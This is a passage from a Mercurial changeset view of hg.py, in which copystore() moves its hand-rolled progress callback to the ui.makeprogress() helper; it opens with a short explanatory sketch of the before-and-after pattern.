copystore: use progress helper...
Martin von Zweigbergk
r38399:63e6f5ae default
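This changeset replaces the hand-rolled progress reporting in copystore() (a local prog() callback handed to util.copyfiles(), plus closetopic bookkeeping to close the topic afterwards) with the ui.makeprogress() helper, which is passed to util.copyfiles() directly and finished with a single progress.complete() call; the matching consumer-side change in util.py is truncated out of the second hunk below. What follows is a minimal, self-contained sketch of the before/after pattern. The Progress and FakeUI classes and the copyfiles_old/copyfiles_new functions are hypothetical stand-ins for illustration, not Mercurial's real implementation; only ui.progress(), ui.makeprogress() and complete() appear in the diff itself.

# Hypothetical stand-ins: Progress mimics the object returned by
# ui.makeprogress(topic); FakeUI exposes the old and new entry points.
class Progress(object):
    def __init__(self, ui, topic):
        self._ui, self._topic = ui, topic
    def update(self, pos):
        self._ui.progress(self._topic, pos)
    def complete(self):
        # the helper itself closes the topic
        self._ui.progress(self._topic, None)

class FakeUI(object):
    def progress(self, topic, pos):
        print('%s: %s' % (topic, pos))
    def makeprogress(self, topic):
        return Progress(self, topic)

def copyfiles_old(names, progress=None):
    # old convention: 'progress' is a callback taking (topic, pos);
    # a final call with pos=None marks the end of one batch
    for pos, name in enumerate(names):
        if progress:
            progress('copying', pos)
    if progress:
        progress('copying', None)

def copyfiles_new(names, progress=None):
    # new convention: 'progress' is the helper object itself
    for pos, name in enumerate(names):
        if progress:
            progress.update(pos)

ui = FakeUI()

# Before: wrap ui.progress() in a closure and remember which topic
# still has to be closed once all batches are done.
closetopic = [None]
def prog(topic, pos):
    if pos is None:
        closetopic[0] = topic
    else:
        ui.progress(topic, pos)
copyfiles_old(['a', 'b'], progress=prog)
if closetopic[0]:
    ui.progress(closetopic[0], None)

# After: the helper owns the topic; one complete() call closes it.
progress = ui.makeprogress('copying')
copyfiles_new(['a', 'b'], progress)
progress.complete()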
@@ -1,1170 +1,1163 b''
1 1 # hg.py - repository classes for mercurial
2 2 #
3 3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 4 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 5 #
6 6 # This software may be used and distributed according to the terms of the
7 7 # GNU General Public License version 2 or any later version.
8 8
9 9 from __future__ import absolute_import
10 10
11 11 import errno
12 12 import hashlib
13 13 import os
14 14 import shutil
15 15 import stat
16 16
17 17 from .i18n import _
18 18 from .node import (
19 19 nullid,
20 20 )
21 21
22 22 from . import (
23 23 bookmarks,
24 24 bundlerepo,
25 25 cacheutil,
26 26 cmdutil,
27 27 destutil,
28 28 discovery,
29 29 error,
30 30 exchange,
31 31 extensions,
32 32 httppeer,
33 33 localrepo,
34 34 lock,
35 35 logcmdutil,
36 36 logexchange,
37 37 merge as mergemod,
38 38 node,
39 39 phases,
40 40 scmutil,
41 41 sshpeer,
42 42 statichttprepo,
43 43 ui as uimod,
44 44 unionrepo,
45 45 url,
46 46 util,
47 47 verify as verifymod,
48 48 vfs as vfsmod,
49 49 )
50 50
51 51 from .utils import (
52 52 stringutil,
53 53 )
54 54
55 55 release = lock.release
56 56
57 57 # shared features
58 58 sharedbookmarks = 'bookmarks'
59 59
60 60 def _local(path):
61 61 path = util.expandpath(util.urllocalpath(path))
62 62 return (os.path.isfile(path) and bundlerepo or localrepo)
63 63
64 64 def addbranchrevs(lrepo, other, branches, revs):
65 65 peer = other.peer() # a courtesy to callers using a localrepo for other
66 66 hashbranch, branches = branches
67 67 if not hashbranch and not branches:
68 68 x = revs or None
69 69 if revs:
70 70 y = revs[0]
71 71 else:
72 72 y = None
73 73 return x, y
74 74 if revs:
75 75 revs = list(revs)
76 76 else:
77 77 revs = []
78 78
79 79 if not peer.capable('branchmap'):
80 80 if branches:
81 81 raise error.Abort(_("remote branch lookup not supported"))
82 82 revs.append(hashbranch)
83 83 return revs, revs[0]
84 84
85 85 with peer.commandexecutor() as e:
86 86 branchmap = e.callcommand('branchmap', {}).result()
87 87
88 88 def primary(branch):
89 89 if branch == '.':
90 90 if not lrepo:
91 91 raise error.Abort(_("dirstate branch not accessible"))
92 92 branch = lrepo.dirstate.branch()
93 93 if branch in branchmap:
94 94 revs.extend(node.hex(r) for r in reversed(branchmap[branch]))
95 95 return True
96 96 else:
97 97 return False
98 98
99 99 for branch in branches:
100 100 if not primary(branch):
101 101 raise error.RepoLookupError(_("unknown branch '%s'") % branch)
102 102 if hashbranch:
103 103 if not primary(hashbranch):
104 104 revs.append(hashbranch)
105 105 return revs, revs[0]
106 106
107 107 def parseurl(path, branches=None):
108 108 '''parse url#branch, returning (url, (branch, branches))'''
109 109
110 110 u = util.url(path)
111 111 branch = None
112 112 if u.fragment:
113 113 branch = u.fragment
114 114 u.fragment = None
115 115 return bytes(u), (branch, branches or [])
116 116
117 117 schemes = {
118 118 'bundle': bundlerepo,
119 119 'union': unionrepo,
120 120 'file': _local,
121 121 'http': httppeer,
122 122 'https': httppeer,
123 123 'ssh': sshpeer,
124 124 'static-http': statichttprepo,
125 125 }
126 126
127 127 def _peerlookup(path):
128 128 u = util.url(path)
129 129 scheme = u.scheme or 'file'
130 130 thing = schemes.get(scheme) or schemes['file']
131 131 try:
132 132 return thing(path)
133 133 except TypeError:
134 134 # we can't test callable(thing) because 'thing' can be an unloaded
135 135 # module that implements __call__
136 136 if not util.safehasattr(thing, 'instance'):
137 137 raise
138 138 return thing
139 139
140 140 def islocal(repo):
141 141 '''return true if repo (or path pointing to repo) is local'''
142 142 if isinstance(repo, bytes):
143 143 try:
144 144 return _peerlookup(repo).islocal(repo)
145 145 except AttributeError:
146 146 return False
147 147 return repo.local()
148 148
149 149 def openpath(ui, path):
150 150 '''open path with open if local, url.open if remote'''
151 151 pathurl = util.url(path, parsequery=False, parsefragment=False)
152 152 if pathurl.islocal():
153 153 return util.posixfile(pathurl.localpath(), 'rb')
154 154 else:
155 155 return url.open(ui, path)
156 156
157 157 # a list of (ui, repo) functions called for wire peer initialization
158 158 wirepeersetupfuncs = []
159 159
160 160 def _peerorrepo(ui, path, create=False, presetupfuncs=None,
161 161 intents=None):
162 162 """return a repository object for the specified path"""
163 163 obj = _peerlookup(path).instance(ui, path, create, intents=intents)
164 164 ui = getattr(obj, "ui", ui)
165 165 for f in presetupfuncs or []:
166 166 f(ui, obj)
167 167 for name, module in extensions.extensions(ui):
168 168 hook = getattr(module, 'reposetup', None)
169 169 if hook:
170 170 hook(ui, obj)
171 171 if not obj.local():
172 172 for f in wirepeersetupfuncs:
173 173 f(ui, obj)
174 174 return obj
175 175
176 176 def repository(ui, path='', create=False, presetupfuncs=None, intents=None):
177 177 """return a repository object for the specified path"""
178 178 peer = _peerorrepo(ui, path, create, presetupfuncs=presetupfuncs,
179 179 intents=intents)
180 180 repo = peer.local()
181 181 if not repo:
182 182 raise error.Abort(_("repository '%s' is not local") %
183 183 (path or peer.url()))
184 184 return repo.filtered('visible')
185 185
186 186 def peer(uiorrepo, opts, path, create=False, intents=None):
187 187 '''return a repository peer for the specified path'''
188 188 rui = remoteui(uiorrepo, opts)
189 189 return _peerorrepo(rui, path, create, intents=intents).peer()
190 190
191 191 def defaultdest(source):
192 192 '''return default destination of clone if none is given
193 193
194 194 >>> defaultdest(b'foo')
195 195 'foo'
196 196 >>> defaultdest(b'/foo/bar')
197 197 'bar'
198 198 >>> defaultdest(b'/')
199 199 ''
200 200 >>> defaultdest(b'')
201 201 ''
202 202 >>> defaultdest(b'http://example.org/')
203 203 ''
204 204 >>> defaultdest(b'http://example.org/foo/')
205 205 'foo'
206 206 '''
207 207 path = util.url(source).path
208 208 if not path:
209 209 return ''
210 210 return os.path.basename(os.path.normpath(path))
211 211
212 212 def sharedreposource(repo):
213 213 """Returns repository object for source repository of a shared repo.
214 214
215 215 If repo is not a shared repository, returns None.
216 216 """
217 217 if repo.sharedpath == repo.path:
218 218 return None
219 219
220 220 if util.safehasattr(repo, 'srcrepo') and repo.srcrepo:
221 221 return repo.srcrepo
222 222
223 223 # the sharedpath always ends in the .hg; we want the path to the repo
224 224 source = repo.vfs.split(repo.sharedpath)[0]
225 225 srcurl, branches = parseurl(source)
226 226 srcrepo = repository(repo.ui, srcurl)
227 227 repo.srcrepo = srcrepo
228 228 return srcrepo
229 229
230 230 def share(ui, source, dest=None, update=True, bookmarks=True, defaultpath=None,
231 231 relative=False):
232 232 '''create a shared repository'''
233 233
234 234 if not islocal(source):
235 235 raise error.Abort(_('can only share local repositories'))
236 236
237 237 if not dest:
238 238 dest = defaultdest(source)
239 239 else:
240 240 dest = ui.expandpath(dest)
241 241
242 242 if isinstance(source, bytes):
243 243 origsource = ui.expandpath(source)
244 244 source, branches = parseurl(origsource)
245 245 srcrepo = repository(ui, source)
246 246 rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None)
247 247 else:
248 248 srcrepo = source.local()
249 249 origsource = source = srcrepo.url()
250 250 checkout = None
251 251
252 252 sharedpath = srcrepo.sharedpath # if our source is already sharing
253 253
254 254 destwvfs = vfsmod.vfs(dest, realpath=True)
255 255 destvfs = vfsmod.vfs(os.path.join(destwvfs.base, '.hg'), realpath=True)
256 256
257 257 if destvfs.lexists():
258 258 raise error.Abort(_('destination already exists'))
259 259
260 260 if not destwvfs.isdir():
261 261 destwvfs.mkdir()
262 262 destvfs.makedir()
263 263
264 264 requirements = ''
265 265 try:
266 266 requirements = srcrepo.vfs.read('requires')
267 267 except IOError as inst:
268 268 if inst.errno != errno.ENOENT:
269 269 raise
270 270
271 271 if relative:
272 272 try:
273 273 sharedpath = os.path.relpath(sharedpath, destvfs.base)
274 274 requirements += 'relshared\n'
275 275 except (IOError, ValueError) as e:
276 276 # ValueError is raised on Windows if the drive letters differ on
277 277 # each path
278 278 raise error.Abort(_('cannot calculate relative path'),
279 279 hint=stringutil.forcebytestr(e))
280 280 else:
281 281 requirements += 'shared\n'
282 282
283 283 destvfs.write('requires', requirements)
284 284 destvfs.write('sharedpath', sharedpath)
285 285
286 286 r = repository(ui, destwvfs.base)
287 287 postshare(srcrepo, r, bookmarks=bookmarks, defaultpath=defaultpath)
288 288 _postshareupdate(r, update, checkout=checkout)
289 289 return r
290 290
291 291 def unshare(ui, repo):
292 292 """convert a shared repository to a normal one
293 293
294 294 Copy the store data to the repo and remove the sharedpath data.
295 295 """
296 296
297 297 destlock = lock = None
298 298 lock = repo.lock()
299 299 try:
300 300 # we use locks here because if we race with commit, we
301 301 # can end up with extra data in the cloned revlogs that's
302 302 # not pointed to by changesets, thus causing verify to
303 303 # fail
304 304
305 305 destlock = copystore(ui, repo, repo.path)
306 306
307 307 sharefile = repo.vfs.join('sharedpath')
308 308 util.rename(sharefile, sharefile + '.old')
309 309
310 310 repo.requirements.discard('shared')
311 311 repo.requirements.discard('relshared')
312 312 repo._writerequirements()
313 313 finally:
314 314 destlock and destlock.release()
315 315 lock and lock.release()
316 316
317 317 # update store, spath, svfs and sjoin of repo
318 318 repo.unfiltered().__init__(repo.baseui, repo.root)
319 319
320 320 # TODO: figure out how to access subrepos that exist, but were previously
321 321 # removed from .hgsub
322 322 c = repo['.']
323 323 subs = c.substate
324 324 for s in sorted(subs):
325 325 c.sub(s).unshare()
326 326
327 327 def postshare(sourcerepo, destrepo, bookmarks=True, defaultpath=None):
328 328 """Called after a new shared repo is created.
329 329
330 330 The new repo only has a requirements file and pointer to the source.
331 331 This function configures additional shared data.
332 332
333 333 Extensions can wrap this function and write additional entries to
334 334 destrepo/.hg/shared to indicate additional pieces of data to be shared.
335 335 """
336 336 default = defaultpath or sourcerepo.ui.config('paths', 'default')
337 337 if default:
338 338 template = ('[paths]\n'
339 339 'default = %s\n')
340 340 destrepo.vfs.write('hgrc', util.tonativeeol(template % default))
341 341
342 342 with destrepo.wlock():
343 343 if bookmarks:
344 344 destrepo.vfs.write('shared', sharedbookmarks + '\n')
345 345
346 346 def _postshareupdate(repo, update, checkout=None):
347 347 """Maybe perform a working directory update after a shared repo is created.
348 348
349 349 ``update`` can be a boolean or a revision to update to.
350 350 """
351 351 if not update:
352 352 return
353 353
354 354 repo.ui.status(_("updating working directory\n"))
355 355 if update is not True:
356 356 checkout = update
357 357 for test in (checkout, 'default', 'tip'):
358 358 if test is None:
359 359 continue
360 360 try:
361 361 uprev = repo.lookup(test)
362 362 break
363 363 except error.RepoLookupError:
364 364 continue
365 365 _update(repo, uprev)
366 366
367 367 def copystore(ui, srcrepo, destpath):
368 368 '''copy files from store of srcrepo in destpath
369 369
370 370 returns destlock
371 371 '''
372 372 destlock = None
373 373 try:
374 374 hardlink = None
375 topic = _('linking') if hardlink else _('copying')
376 progress = ui.makeprogress(topic)
375 377 num = 0
376 closetopic = [None]
377 def prog(topic, pos):
378 if pos is None:
379 closetopic[0] = topic
380 else:
381 ui.progress(topic, pos + num)
382 378 srcpublishing = srcrepo.publishing()
383 379 srcvfs = vfsmod.vfs(srcrepo.sharedpath)
384 380 dstvfs = vfsmod.vfs(destpath)
385 381 for f in srcrepo.store.copylist():
386 382 if srcpublishing and f.endswith('phaseroots'):
387 383 continue
388 384 dstbase = os.path.dirname(f)
389 385 if dstbase and not dstvfs.exists(dstbase):
390 386 dstvfs.mkdir(dstbase)
391 387 if srcvfs.exists(f):
392 388 if f.endswith('data'):
393 389 # 'dstbase' may be empty (e.g. revlog format 0)
394 390 lockfile = os.path.join(dstbase, "lock")
395 391 # lock to avoid premature writing to the target
396 392 destlock = lock.lock(dstvfs, lockfile)
397 393 hardlink, n = util.copyfiles(srcvfs.join(f), dstvfs.join(f),
398 hardlink, progress=prog)
394 hardlink, progress)
399 395 num += n
400 396 if hardlink:
401 397 ui.debug("linked %d files\n" % num)
402 if closetopic[0]:
403 ui.progress(closetopic[0], None)
404 398 else:
405 399 ui.debug("copied %d files\n" % num)
406 if closetopic[0]:
407 ui.progress(closetopic[0], None)
400 progress.complete()
408 401 return destlock
409 402 except: # re-raises
410 403 release(destlock)
411 404 raise
412 405
413 406 def clonewithshare(ui, peeropts, sharepath, source, srcpeer, dest, pull=False,
414 407 rev=None, update=True, stream=False):
415 408 """Perform a clone using a shared repo.
416 409
417 410 The store for the repository will be located at <sharepath>/.hg. The
418 411 specified revisions will be cloned or pulled from "source". A shared repo
419 412 will be created at "dest" and a working copy will be created if "update" is
420 413 True.
421 414 """
422 415 revs = None
423 416 if rev:
424 417 if not srcpeer.capable('lookup'):
425 418 raise error.Abort(_("src repository does not support "
426 419 "revision lookup and so doesn't "
427 420 "support clone by revision"))
428 421
429 422 # TODO this is batchable.
430 423 remoterevs = []
431 424 for r in rev:
432 425 with srcpeer.commandexecutor() as e:
433 426 remoterevs.append(e.callcommand('lookup', {
434 427 'key': r,
435 428 }).result())
436 429 revs = remoterevs
437 430
438 431 # Obtain a lock before checking for or cloning the pooled repo otherwise
439 432 # 2 clients may race creating or populating it.
440 433 pooldir = os.path.dirname(sharepath)
441 434 # lock class requires the directory to exist.
442 435 try:
443 436 util.makedir(pooldir, False)
444 437 except OSError as e:
445 438 if e.errno != errno.EEXIST:
446 439 raise
447 440
448 441 poolvfs = vfsmod.vfs(pooldir)
449 442 basename = os.path.basename(sharepath)
450 443
451 444 with lock.lock(poolvfs, '%s.lock' % basename):
452 445 if os.path.exists(sharepath):
453 446 ui.status(_('(sharing from existing pooled repository %s)\n') %
454 447 basename)
455 448 else:
456 449 ui.status(_('(sharing from new pooled repository %s)\n') % basename)
457 450 # Always use pull mode because hardlinks in share mode don't work
458 451 # well. Never update because working copies aren't necessary in
459 452 # share mode.
460 453 clone(ui, peeropts, source, dest=sharepath, pull=True,
461 454 revs=rev, update=False, stream=stream)
462 455
463 456 # Resolve the value to put in [paths] section for the source.
464 457 if islocal(source):
465 458 defaultpath = os.path.abspath(util.urllocalpath(source))
466 459 else:
467 460 defaultpath = source
468 461
469 462 sharerepo = repository(ui, path=sharepath)
470 463 share(ui, sharerepo, dest=dest, update=False, bookmarks=False,
471 464 defaultpath=defaultpath)
472 465
473 466 # We need to perform a pull against the dest repo to fetch bookmarks
474 467 # and other non-store data that isn't shared by default. In the case of
475 468 # non-existing shared repo, this means we pull from the remote twice. This
476 469 # is a bit weird. But at the time it was implemented, there wasn't an easy
477 470 # way to pull just non-changegroup data.
478 471 destrepo = repository(ui, path=dest)
479 472 exchange.pull(destrepo, srcpeer, heads=revs)
480 473
481 474 _postshareupdate(destrepo, update)
482 475
483 476 return srcpeer, peer(ui, peeropts, dest)
484 477
485 478 # Recomputing branch cache might be slow on big repos,
486 479 # so just copy it
487 480 def _copycache(srcrepo, dstcachedir, fname):
488 481 """copy a cache from srcrepo to destcachedir (if it exists)"""
489 482 srcbranchcache = srcrepo.vfs.join('cache/%s' % fname)
490 483 dstbranchcache = os.path.join(dstcachedir, fname)
491 484 if os.path.exists(srcbranchcache):
492 485 if not os.path.exists(dstcachedir):
493 486 os.mkdir(dstcachedir)
494 487 util.copyfile(srcbranchcache, dstbranchcache)
495 488
496 489 def clone(ui, peeropts, source, dest=None, pull=False, revs=None,
497 490 update=True, stream=False, branch=None, shareopts=None):
498 491 """Make a copy of an existing repository.
499 492
500 493 Create a copy of an existing repository in a new directory. The
501 494 source and destination are URLs, as passed to the repository
502 495 function. Returns a pair of repository peers, the source and
503 496 newly created destination.
504 497
505 498 The location of the source is added to the new repository's
506 499 .hg/hgrc file, as the default to be used for future pulls and
507 500 pushes.
508 501
509 502 If an exception is raised, the partly cloned/updated destination
510 503 repository will be deleted.
511 504
512 505 Arguments:
513 506
514 507 source: repository object or URL
515 508
516 509 dest: URL of destination repository to create (defaults to base
517 510 name of source repository)
518 511
519 512 pull: always pull from source repository, even in local case or if the
520 513 server prefers streaming
521 514
522 515 stream: stream raw data uncompressed from repository (fast over
523 516 LAN, slow over WAN)
524 517
525 518 revs: revision to clone up to (implies pull=True)
526 519
527 520 update: update working directory after clone completes, if
528 521 destination is local repository (True means update to default rev,
529 522 anything else is treated as a revision)
530 523
531 524 branch: branches to clone
532 525
533 526 shareopts: dict of options to control auto sharing behavior. The "pool" key
534 527 activates auto sharing mode and defines the directory for stores. The
535 528 "mode" key determines how to construct the directory name of the shared
536 529 repository. "identity" means the name is derived from the node of the first
537 530 changeset in the repository. "remote" means the name is derived from the
538 531 remote's path/URL. Defaults to "identity."
539 532 """
540 533
541 534 if isinstance(source, bytes):
542 535 origsource = ui.expandpath(source)
543 536 source, branches = parseurl(origsource, branch)
544 537 srcpeer = peer(ui, peeropts, source)
545 538 else:
546 539 srcpeer = source.peer() # in case we were called with a localrepo
547 540 branches = (None, branch or [])
548 541 origsource = source = srcpeer.url()
549 542 revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs)
550 543
551 544 if dest is None:
552 545 dest = defaultdest(source)
553 546 if dest:
554 547 ui.status(_("destination directory: %s\n") % dest)
555 548 else:
556 549 dest = ui.expandpath(dest)
557 550
558 551 dest = util.urllocalpath(dest)
559 552 source = util.urllocalpath(source)
560 553
561 554 if not dest:
562 555 raise error.Abort(_("empty destination path is not valid"))
563 556
564 557 destvfs = vfsmod.vfs(dest, expandpath=True)
565 558 if destvfs.lexists():
566 559 if not destvfs.isdir():
567 560 raise error.Abort(_("destination '%s' already exists") % dest)
568 561 elif destvfs.listdir():
569 562 raise error.Abort(_("destination '%s' is not empty") % dest)
570 563
571 564 shareopts = shareopts or {}
572 565 sharepool = shareopts.get('pool')
573 566 sharenamemode = shareopts.get('mode')
574 567 if sharepool and islocal(dest):
575 568 sharepath = None
576 569 if sharenamemode == 'identity':
577 570 # Resolve the name from the initial changeset in the remote
578 571 # repository. This returns nullid when the remote is empty. It
579 572 # raises RepoLookupError if revision 0 is filtered or otherwise
580 573 # not available. If we fail to resolve, sharing is not enabled.
581 574 try:
582 575 with srcpeer.commandexecutor() as e:
583 576 rootnode = e.callcommand('lookup', {
584 577 'key': '0',
585 578 }).result()
586 579
587 580 if rootnode != node.nullid:
588 581 sharepath = os.path.join(sharepool, node.hex(rootnode))
589 582 else:
590 583 ui.status(_('(not using pooled storage: '
591 584 'remote appears to be empty)\n'))
592 585 except error.RepoLookupError:
593 586 ui.status(_('(not using pooled storage: '
594 587 'unable to resolve identity of remote)\n'))
595 588 elif sharenamemode == 'remote':
596 589 sharepath = os.path.join(
597 590 sharepool, node.hex(hashlib.sha1(source).digest()))
598 591 else:
599 592 raise error.Abort(_('unknown share naming mode: %s') %
600 593 sharenamemode)
601 594
602 595 if sharepath:
603 596 return clonewithshare(ui, peeropts, sharepath, source, srcpeer,
604 597 dest, pull=pull, rev=revs, update=update,
605 598 stream=stream)
606 599
607 600 srclock = destlock = cleandir = None
608 601 srcrepo = srcpeer.local()
609 602 try:
610 603 abspath = origsource
611 604 if islocal(origsource):
612 605 abspath = os.path.abspath(util.urllocalpath(origsource))
613 606
614 607 if islocal(dest):
615 608 cleandir = dest
616 609
617 610 copy = False
618 611 if (srcrepo and srcrepo.cancopy() and islocal(dest)
619 612 and not phases.hassecret(srcrepo)):
620 613 copy = not pull and not revs
621 614
622 615 if copy:
623 616 try:
624 617 # we use a lock here because if we race with commit, we
625 618 # can end up with extra data in the cloned revlogs that's
626 619 # not pointed to by changesets, thus causing verify to
627 620 # fail
628 621 srclock = srcrepo.lock(wait=False)
629 622 except error.LockError:
630 623 copy = False
631 624
632 625 if copy:
633 626 srcrepo.hook('preoutgoing', throw=True, source='clone')
634 627 hgdir = os.path.realpath(os.path.join(dest, ".hg"))
635 628 if not os.path.exists(dest):
636 629 os.mkdir(dest)
637 630 else:
638 631 # only clean up directories we create ourselves
639 632 cleandir = hgdir
640 633 try:
641 634 destpath = hgdir
642 635 util.makedir(destpath, notindexed=True)
643 636 except OSError as inst:
644 637 if inst.errno == errno.EEXIST:
645 638 cleandir = None
646 639 raise error.Abort(_("destination '%s' already exists")
647 640 % dest)
648 641 raise
649 642
650 643 destlock = copystore(ui, srcrepo, destpath)
651 644 # copy bookmarks over
652 645 srcbookmarks = srcrepo.vfs.join('bookmarks')
653 646 dstbookmarks = os.path.join(destpath, 'bookmarks')
654 647 if os.path.exists(srcbookmarks):
655 648 util.copyfile(srcbookmarks, dstbookmarks)
656 649
657 650 dstcachedir = os.path.join(destpath, 'cache')
658 651 for cache in cacheutil.cachetocopy(srcrepo):
659 652 _copycache(srcrepo, dstcachedir, cache)
660 653
661 654 # we need to re-init the repo after manually copying the data
662 655 # into it
663 656 destpeer = peer(srcrepo, peeropts, dest)
664 657 srcrepo.hook('outgoing', source='clone',
665 658 node=node.hex(node.nullid))
666 659 else:
667 660 try:
668 661 destpeer = peer(srcrepo or ui, peeropts, dest, create=True)
669 662 # only pass ui when no srcrepo
670 663 except OSError as inst:
671 664 if inst.errno == errno.EEXIST:
672 665 cleandir = None
673 666 raise error.Abort(_("destination '%s' already exists")
674 667 % dest)
675 668 raise
676 669
677 670 if revs:
678 671 if not srcpeer.capable('lookup'):
679 672 raise error.Abort(_("src repository does not support "
680 673 "revision lookup and so doesn't "
681 674 "support clone by revision"))
682 675
683 676 # TODO this is batchable.
684 677 remoterevs = []
685 678 for rev in revs:
686 679 with srcpeer.commandexecutor() as e:
687 680 remoterevs.append(e.callcommand('lookup', {
688 681 'key': rev,
689 682 }).result())
690 683 revs = remoterevs
691 684
692 685 checkout = revs[0]
693 686 else:
694 687 revs = None
695 688 local = destpeer.local()
696 689 if local:
697 690 u = util.url(abspath)
698 691 defaulturl = bytes(u)
699 692 local.ui.setconfig('paths', 'default', defaulturl, 'clone')
700 693 if not stream:
701 694 if pull:
702 695 stream = False
703 696 else:
704 697 stream = None
705 698 # internal config: ui.quietbookmarkmove
706 699 overrides = {('ui', 'quietbookmarkmove'): True}
707 700 with local.ui.configoverride(overrides, 'clone'):
708 701 exchange.pull(local, srcpeer, revs,
709 702 streamclonerequested=stream)
710 703 elif srcrepo:
711 704 exchange.push(srcrepo, destpeer, revs=revs,
712 705 bookmarks=srcrepo._bookmarks.keys())
713 706 else:
714 707 raise error.Abort(_("clone from remote to remote not supported")
715 708 )
716 709
717 710 cleandir = None
718 711
719 712 destrepo = destpeer.local()
720 713 if destrepo:
721 714 template = uimod.samplehgrcs['cloned']
722 715 u = util.url(abspath)
723 716 u.passwd = None
724 717 defaulturl = bytes(u)
725 718 destrepo.vfs.write('hgrc', util.tonativeeol(template % defaulturl))
726 719 destrepo.ui.setconfig('paths', 'default', defaulturl, 'clone')
727 720
728 721 if ui.configbool('experimental', 'remotenames'):
729 722 logexchange.pullremotenames(destrepo, srcpeer)
730 723
731 724 if update:
732 725 if update is not True:
733 726 with srcpeer.commandexecutor() as e:
734 727 checkout = e.callcommand('lookup', {
735 728 'key': update,
736 729 }).result()
737 730
738 731 uprev = None
739 732 status = None
740 733 if checkout is not None:
741 734 if checkout in destrepo:
742 735 uprev = checkout
743 736 else:
744 737 if update is not True:
745 738 try:
746 739 uprev = destrepo.lookup(update)
747 740 except error.RepoLookupError:
748 741 pass
749 742 if uprev is None:
750 743 try:
751 744 uprev = destrepo._bookmarks['@']
752 745 update = '@'
753 746 bn = destrepo[uprev].branch()
754 747 if bn == 'default':
755 748 status = _("updating to bookmark @\n")
756 749 else:
757 750 status = (_("updating to bookmark @ on branch %s\n")
758 751 % bn)
759 752 except KeyError:
760 753 try:
761 754 uprev = destrepo.branchtip('default')
762 755 except error.RepoLookupError:
763 756 uprev = destrepo.lookup('tip')
764 757 if not status:
765 758 bn = destrepo[uprev].branch()
766 759 status = _("updating to branch %s\n") % bn
767 760 destrepo.ui.status(status)
768 761 _update(destrepo, uprev)
769 762 if update in destrepo._bookmarks:
770 763 bookmarks.activate(destrepo, update)
771 764 finally:
772 765 release(srclock, destlock)
773 766 if cleandir is not None:
774 767 shutil.rmtree(cleandir, True)
775 768 if srcpeer is not None:
776 769 srcpeer.close()
777 770 return srcpeer, destpeer
778 771
779 772 def _showstats(repo, stats, quietempty=False):
780 773 if quietempty and stats.isempty():
781 774 return
782 775 repo.ui.status(_("%d files updated, %d files merged, "
783 776 "%d files removed, %d files unresolved\n") % (
784 777 stats.updatedcount, stats.mergedcount,
785 778 stats.removedcount, stats.unresolvedcount))
786 779
787 780 def updaterepo(repo, node, overwrite, updatecheck=None):
788 781 """Update the working directory to node.
789 782
791 784 When overwrite is set, changes are clobbered; otherwise they are merged
791 784
792 785 returns stats (see pydoc mercurial.merge.applyupdates)"""
793 786 return mergemod.update(repo, node, False, overwrite,
794 787 labels=['working copy', 'destination'],
795 788 updatecheck=updatecheck)
796 789
797 790 def update(repo, node, quietempty=False, updatecheck=None):
798 791 """update the working directory to node"""
799 792 stats = updaterepo(repo, node, False, updatecheck=updatecheck)
800 793 _showstats(repo, stats, quietempty)
801 794 if stats.unresolvedcount:
802 795 repo.ui.status(_("use 'hg resolve' to retry unresolved file merges\n"))
803 796 return stats.unresolvedcount > 0
804 797
805 798 # naming conflict in clone()
806 799 _update = update
807 800
808 801 def clean(repo, node, show_stats=True, quietempty=False):
809 802 """forcibly switch the working directory to node, clobbering changes"""
810 803 stats = updaterepo(repo, node, True)
811 804 repo.vfs.unlinkpath('graftstate', ignoremissing=True)
812 805 if show_stats:
813 806 _showstats(repo, stats, quietempty)
814 807 return stats.unresolvedcount > 0
815 808
816 809 # naming conflict in updatetotally()
817 810 _clean = clean
818 811
819 812 def updatetotally(ui, repo, checkout, brev, clean=False, updatecheck=None):
820 813 """Update the working directory with extra care for non-file components
821 814
822 815 This takes care of non-file components below:
823 816
824 817 :bookmark: might be advanced or (in)activated
825 818
826 819 This takes arguments below:
827 820
828 821 :checkout: to which revision the working directory is updated
829 822 :brev: a name, which might be a bookmark to be activated after updating
830 823 :clean: whether changes in the working directory can be discarded
831 824 :updatecheck: how to deal with a dirty working directory
832 825
833 826 Valid values for updatecheck are (None => linear):
834 827
835 828 * abort: abort if the working directory is dirty
836 829 * none: don't check (merge working directory changes into destination)
837 830 * linear: check that update is linear before merging working directory
838 831 changes into destination
839 832 * noconflict: check that the update does not result in file merges
840 833
841 834 This returns whether conflict is detected at updating or not.
842 835 """
843 836 if updatecheck is None:
844 837 updatecheck = ui.config('commands', 'update.check')
845 838 if updatecheck not in ('abort', 'none', 'linear', 'noconflict'):
846 839 # If not configured, or invalid value configured
847 840 updatecheck = 'linear'
848 841 with repo.wlock():
849 842 movemarkfrom = None
850 843 warndest = False
851 844 if checkout is None:
852 845 updata = destutil.destupdate(repo, clean=clean)
853 846 checkout, movemarkfrom, brev = updata
854 847 warndest = True
855 848
856 849 if clean:
857 850 ret = _clean(repo, checkout)
858 851 else:
859 852 if updatecheck == 'abort':
860 853 cmdutil.bailifchanged(repo, merge=False)
861 854 updatecheck = 'none'
862 855 ret = _update(repo, checkout, updatecheck=updatecheck)
863 856
864 857 if not ret and movemarkfrom:
865 858 if movemarkfrom == repo['.'].node():
866 859 pass # no-op update
867 860 elif bookmarks.update(repo, [movemarkfrom], repo['.'].node()):
868 861 b = ui.label(repo._activebookmark, 'bookmarks.active')
869 862 ui.status(_("updating bookmark %s\n") % b)
870 863 else:
871 864 # this can happen with a non-linear update
872 865 b = ui.label(repo._activebookmark, 'bookmarks')
873 866 ui.status(_("(leaving bookmark %s)\n") % b)
874 867 bookmarks.deactivate(repo)
875 868 elif brev in repo._bookmarks:
876 869 if brev != repo._activebookmark:
877 870 b = ui.label(brev, 'bookmarks.active')
878 871 ui.status(_("(activating bookmark %s)\n") % b)
879 872 bookmarks.activate(repo, brev)
880 873 elif brev:
881 874 if repo._activebookmark:
882 875 b = ui.label(repo._activebookmark, 'bookmarks')
883 876 ui.status(_("(leaving bookmark %s)\n") % b)
884 877 bookmarks.deactivate(repo)
885 878
886 879 if warndest:
887 880 destutil.statusotherdests(ui, repo)
888 881
889 882 return ret
890 883
891 884 def merge(repo, node, force=None, remind=True, mergeforce=False, labels=None,
892 885 abort=False):
893 886 """Branch merge with node, resolving changes. Return true if any
894 887 unresolved conflicts."""
895 888 if not abort:
